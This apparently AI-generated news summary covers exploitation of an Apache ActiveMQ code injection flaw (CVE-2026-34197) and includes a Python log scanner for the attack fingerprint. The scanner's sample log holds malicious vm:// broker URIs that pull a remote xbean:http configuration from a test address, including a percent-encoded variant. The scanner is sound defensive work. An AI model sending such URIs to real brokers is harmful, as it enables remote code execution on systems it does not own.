Apache ActiveMQ flaw exploited in the wild, 6,400 servers exposed
A 13-year-old code injection flaw in Apache ActiveMQ (CVE-2026-34197) is under active exploitation, with Shadowserver counting more than 6,400 internet-exposed instances still unpatched. The bulk sit in Asia (2,925), North America (1,409), and Europe (1,334). Apache shipped fixes on March 30 in ActiveMQ Classic 6.2.3 and 5.19.4, but deployment has clearly lagged.
The bug is an improper input validation weakness that lets authenticated attackers execute arbitrary code on the broker. It was surfaced by Horizon3 researcher Naveen Sunkavally working with Claude as an analysis assistant, notable because the defect survived more than a decade of human review. Indicators of exploitation include connections over the broker's internal VM transport (vm://) whose URI carries a brokerConfig=xbean:http:// parameter, i.e. a broker configuration pulled from a remote URL rather than a local file.
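The fingerprint above is easy to turn into a log check. The following is an added example, not code from the article, Horizon3 or the ActiveMQ project: it parses each URI found in a set of constructed, hypothetical log lines (the line format is invented for the example), and flags a connection only when the transport is vm:// and its brokerConfig parameter references xbean:http:// or xbean:https://. Because it percent-decodes the query string, it also catches an encoded form of the same payload that a literal grep for "brokerConfig=xbean:http://" would miss. A local xbean:file: reference is deliberately not flagged, since that is not the published fingerprint.

```python
"""Detect the CVE-2026-34197 exploitation fingerprint in log lines:
a vm:// broker connection whose brokerConfig points at a remote xbean:http(s) URL.
Log format and sample lines are constructed for this example."""
import re
from urllib.parse import parse_qs, urlsplit

# Any URI-like token (scheme://...) up to the next whitespace or quote.
URI_RE = re.compile(r"\b[a-z][a-z0-9+.\-]*://[^\s\"']+", re.I)

# Remote config locations named by the published fingerprint (http) plus https.
REMOTE_XBEAN_PREFIXES = ("xbean:http://", "xbean:https://")


def is_suspicious_uri(uri: str) -> bool:
    """True if `uri` uses the vm transport and its brokerConfig query parameter
    references a remote xbean:http(s) resource. parse_qs percent-decodes values,
    so xbean%3Ahttp%3A%2F%2F... is treated the same as the literal form."""
    parts = urlsplit(uri)
    if parts.scheme.lower() != "vm":
        return False
    for value in parse_qs(parts.query).get("brokerConfig", []):
        if value.lower().startswith(REMOTE_XBEAN_PREFIXES):
            return True
    return False


def scan_log(lines):
    """Return (1-based line number, offending URI) for every flagged line."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for match in URI_RE.finditer(line):
            if is_suspicious_uri(match.group(0)):
                hits.append((lineno, match.group(0)))
    return hits


# Constructed sample log (hypothetical format; addresses are RFC 5737 test ranges).
SAMPLE_LOG = """\
2026-04-02 10:14:03 INFO  Connector vm://localhost?brokerConfig=xbean:file:conf/activemq.xml started
2026-04-02 10:15:41 WARN  Connection from vm://localhost?brokerConfig=xbean:http://203.0.113.7/poc.xml
2026-04-02 10:16:02 INFO  Client connected over tcp://198.51.100.9:61616
2026-04-02 10:17:55 WARN  Connection from vm://localhost?brokerConfig=xbean%3Ahttps%3A%2F%2F203.0.113.7%2Fp.xml
"""


if __name__ == "__main__":
    for lineno, uri in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {lineno}: suspicious broker connection {uri}")
```

Run against a real broker log by feeding its lines to `scan_log`; lines 2 and 4 of the sample are flagged, the local xbean:file: connector and the plain tcp:// client are not.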
CISA has added the CVE to its KEV catalog and given federal civilian agencies until April 30 to patch or discontinue use of the product. ActiveMQ has a track record as a ransomware target, with TellYouThePass exploiting CVE-2023-46604 as a zero-day, so exposed brokers should be treated as imminent compromise candidates, not routine patch work.
Continue reading at BleepingComputer. This is an AI-generated summary; read the original for the full story.